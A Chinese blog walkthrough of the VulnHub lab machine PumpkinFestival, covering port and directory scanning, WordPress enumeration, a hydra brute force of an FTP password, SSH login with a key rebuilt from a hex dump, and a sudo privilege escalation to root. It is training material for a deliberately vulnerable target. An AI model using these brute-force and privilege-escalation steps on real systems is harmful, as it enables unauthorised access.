vulnhub系列:PumpkinFestival

于 2024-08-09 21:07:01 发布
阅读量563 收藏 14
点赞数 15
分类专栏: vulnhub系列 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jq_j37/article/details/141071047
版权

vulnhub系列:PumpkinFestival

靶机下载

一、信息收集

靶机给出了IP地址:192.168.23.184

image-20240809183311810

nmap扫描端口:开放端口:21、80、6880

nmap 192.168.23.184 -p- -A -sV -Pn

image-20240809183434043

dirb扫描目录

dirb http://192.168.23.184/

image-20240809183540747

访问80端口,提到用户 harry ,看到 Alohomora! ,好像是个人名,或许可以作为账号或密码,留存

image-20240809183619738

token 1

这里没什么发现,f12查看源码,得到一串 token 值

45d9ee7239bc6b0bb21d3f8e1c5faa52

image-20240809183725138

访问robots.txt

image-20240809184141013

token 2

访问tokens时,权限被拒绝,可能存在文件,尝试访问token.txt,得到第二个 token

image-20240809190728850

依次拼接访问,访问 /store/track.txt 时,得到一串值和一个邮箱

Tracking code : 2542 8231 6783 486
admin@pumpkins.local

image-20240809184236165

看到 local ,可能需要绑定hosts,在 hosts 中写入

192.168.23.184 pumpkins.local
token 3

访问 pumpkins.local,发现第三个 token

06c3eb12ef2389e2752335beccfb2080

image-20240809190350185

dirb目录扫描,看到有 wordpress (kali中/etc/hosts也需要配置一下)

dirb http://pumpkins.local/

image-20240809194424514

wpscan扫描一下

wpscan --url http://pumpkins.local -e at -e ap -e u

发现两个用户

admin
morse

image-20240809191757510

发现一个 readme.html 文件,访问一下,发现一串字符

http://pumpkins.local/readme.html

K82v0SuvV1En350M0uxiXVRTmBrQIJQN78s

image-20240809192030902

试了试,是base62编码,解码后得到 用户morse 和 jack 和一个密码

morse & jack : Ug0t!TrIpyJ

image-20240809192949681

token 4

访问 wp-admin,登录

http://pumpkins.local/wp-admin

image-20240809193151618

morse 用户成功登录

morse:Ug0t!TrIpyJ

image-20240809193404209

在 profile 下发现第四个token

7139e925fd43618653e51f820bc6201b
token 5

之前 wpscan 扫描时,扫描到一个admin用户,尝试登录失败,密码,试试之前80端口看到的 Alohomora! ,登录成功,发现第五个token

admin:Alohomora!

f2e00edc353309b40e1aed18e18ab2c4

image-20240809194147494

token 6

ftp 尝试匿名登录,登录成功

ftp 192.168.23.184
anonymous

image-20240809195237213

在 secret 下发现 token.txt ,下载下来,查看文件,得到第六个 token

get token.txt
cat token.txt

2d6dbbae84d724409606eddd9dd71265

image-20240809195401857

目前还剩 harry 用户密码没有获取,尝试破解,使用 hydra 工具,得到密码 yrrah

hydra -l harry -P /usr/share/wordlists/rockyou.txt 192.168.23.184 ftp -e nsr

harry:yrrah

image-20240809205838306

token 7

登录 ftp ,发现 token.txt

ftp 192.168.23.184
harry:yrrah

image-20240809200541909

将文件下载下来查看,得到第七个 token

get token.txt
cat token.txt

ba9fa9abf2be9373b7cbd9a6457f374e

image-20240809200829107

token 8

目录 Donotopen 中,一通遍历,发现 token.txt,下载查看,得到第八个 token

f9c5053d01e0dfc30066476ab0f0564c

image-20240809201742099

二、getshell

还有个 NOOOOO 目录,进入后,再次进入 NOOOOOO 目录,发现一个 data.txt

image-20240809201931036

下载查看,发现是乱码

image-20240809202125419

查看文件类型,是一个 tar 压缩包

file data.txt

image-20240809202228235

解压,最后 jack 为十六进制文件

tar vxf data.txt
tar xjf data
tar vxf key
cat jack

image-20240809202343613

使用 xxd 将 hexdump 转换,得到一个私钥

xxd -r -p jack

image-20240809202958347

复制内容至 aaa ,赋予权限后,进行 ssh 连接,连接成功

chmod 600 aaa
ssh -i aaa jack@192.168.23.184 -p 6880

image-20240809203344858

三、提权

token 9

查看当前目录,发现一个 token,查看为乱码

image-20240809203543410

查看文件类型

file token

image-20240809203656970

执行命令,得到第九个token

./token

8d66ef0055b43d80c34917ec6c75f706

image-20240809203754123

查看当前用户权限,密码 Ug0t!TrIpyJ

sudo -l
Ug0t!TrIpyJ

image-20240809203914153

pumpkins 目录下 alohomora 文件有root权限

创建 pumpkins 目录并创建 alohomora 文件,赋予权限并写入 /bin/bash,sudo执行,提权成功

mkdir pumpkins
cd pumpkins
vi alohomora
/bin/bash

chmod 777 alohomora
sudo ./alohomora

image-20240809204952753

切换到 /root 目录下,发现最后的文件

image-20240809205203211

token 10

看文章发现还漏一个,在 license.txt 中

http://pumpkins.local/license.txt

5ff346114d634a015ce413e1bc3d8d71

image-20240809205320730

三天三夜睡不着
关注
  • 15
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub系列:DeRPnStiNK
jq_j37的博客
08-07 597
vulnhub系列:DeRPnStiNK靶机,打靶文章
vulnhub系列:Lazysysadmin
jq_j37的博客
08-04 366
vulnhub系列:Lazysysadmin靶机,打靶文章
vulnhub系列:Fristileaks 1.3
jq_j37的博客
07-31 498
vulnhub系列:Fristileaks 1.3靶机,打靶文章
Vulnhub靶机:ica1
qq_48904485的博客
01-05 413
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:ica1(10.0.2.5)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/ica-1,748/
vulnhub系列:DepthB2R
jq_j37的博客
08-03 276
vulnhub系列:DepthB2R靶机,打靶文章
vulnhub系列:Zico 2
jq_j37的博客
08-03 356
vulnhub系列:Zico 2靶机,打靶文章
vulnhub系列:Rickdiculously Easy
jq_j37的博客
08-04 393
vulnhub系列:Rickdiculously Easy靶机,打靶文章
Vulnhub靶机:Corrosion 2
qq_48904485的博客
01-10 935
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:corrosion:2(10.0.2.13)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/corrosion-2,745/
vulnhub系列:SkyTower:1
jq_j37的博客
08-01 372
vulnhub系列:SkyTower:1靶机,打靶文章
《密码编码学与网络安全原理与实践》第九章 第十章 公钥密码学与密钥管理
m0_57291352的博客
08-09 603
原则上不能说传统密码优于公钥密码,也不能说公钥密码优于传统密码公钥密码学仅限于用在密钥管理和签名这类应用中与密钥分配中心的会话过程既不比传统密码中的那些过程更简单,也不比之更有效动机:简化密钥分配和管理、实现签名等功能不对称性是公钥最为重要的性质,可以用来保证“真实”性,“不可否认”性非对称密钥:两个密钥:公钥和私钥,用来实现互补运算,即加密和解密,或者生成签名与验证签名;公钥证书:认证机构将用户的姓名和公钥绑定在一起,用户用自己的私钥对数字文件签名后,可以通过证书识别签名者,因为签名者是唯一拥有与证书上对
网络安全】本地文件包含及远程文件包含漏洞详解
goldfish8848的博客
08-05 874
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。
网络安全入门教程(非常详细)从零基础入门到精通!
2301_77160226的博客
08-05 1037
网络安全领域犹如一座深邃的知识宝库,从零基础入门到精通是一段充满挑战但也充满收获的旅程。这不仅需要您对知识的不懈追求,更需要大量的实践与经验积累。希望本教程能够为您的网络安全学习之路点亮明灯,引领您在这个充满机遇与挑战的领域中稳步前行,最终成为一名优秀的网络安全专家,为构建安全的网络世界贡献自己的力量!
网络安全】探索AI 聊天机器人工作流程实现RCE
等风来
08-06 191
我发现了一个广泛使用的AI聊天机器人平台中的远程代码执行漏洞。该漏洞存在于聊天机器人的自定义工作流响应代码中,这些工作流允许开发人员通过创建定制的流程来扩展机器人的功能。
国家网络安全战略如何保护个人信息安全
waitaikong_的博客
08-09 223
网络安全法》规定了个人信息的收集、使用、存储、传输等活动必须遵守法律法规,经过个人同意,并明确告知收集、使用的目的、方式和范围,同时应当保证个人信息的安全性,避免泄露、丢失或被篡改等情况发生。综上所述,国家网络安全战略的实施对个人信息安全产生了积极的影响,通过法律法规的完善、网络安全教育和培训的重视、关键基础设施的安全保护、国际交流与合作、数据分类分级保护以及数据安全风险管理等措施,有效地提高了个人信息的安全保护水平。通过对数据进行分类分级,可以采取不同的保护措施,确保不同级别的数据得到适当的保护。
企业产品网络安全日志0806
KD的疯狂实验室
08-06 257
默认 method,查询字符串 等会被屏蔽,你在日志中是找不到的。应该是为了隐私安全。启用方式依然是WAF面板配置日志CloudTrail的地方去掉你希望显示的所有共4个✓。采样:每一条WAF规则都会产生一个采样默认。你觉得是一个WAF,如果你有20条规则,到日志里就是20倍的量了。后果是:CloudTrail里数据量会暴增。特别是PutEvent的费用。
重庆市合川区第二届网络安全“钓鱼城“杯部分题解
最新发布
m0_60894143的博客
08-09 358
下载文件后,进行分析往下划看见smb最开始以为是通过smb协议下载的文件找半天没发现,往前翻了翻,看见了flag存储为原始数据通过上述分析发现开头是pk,保存为zip压缩包发现需要密码感觉是伪加密使用工具一把梭再次打开压缩包就发现了flag证实了伪加密下载文件发现是内存文件直接工具分析volatility常规分析一波查看镜像信息分析进程发现没有异常查看cmd历史看到创建用户这个关键点先留意然后查看关键字发现有个zip直接导出到本地改为zip。
未来展望:等保测评在网络安全领域的持续创新与发展
A526847的博客
08-09 222
等保测评作为网络安全领域的重要制度,其持续创新与发展对于构建安全可信的网络环境具有重要意义。面对未来网络安全的新挑战和新机遇,等保测评将在技术创新、自动化提升、合规性强化、生态构建、主动防御理念深化以及人才培养等方面不断突破,为护航数字经济和工业互联网的安全发展提供坚实保障。
自学黑客(网络安全
热门推荐
2301_77160226的博客
08-05 1万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
vulnhub靶机系列
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值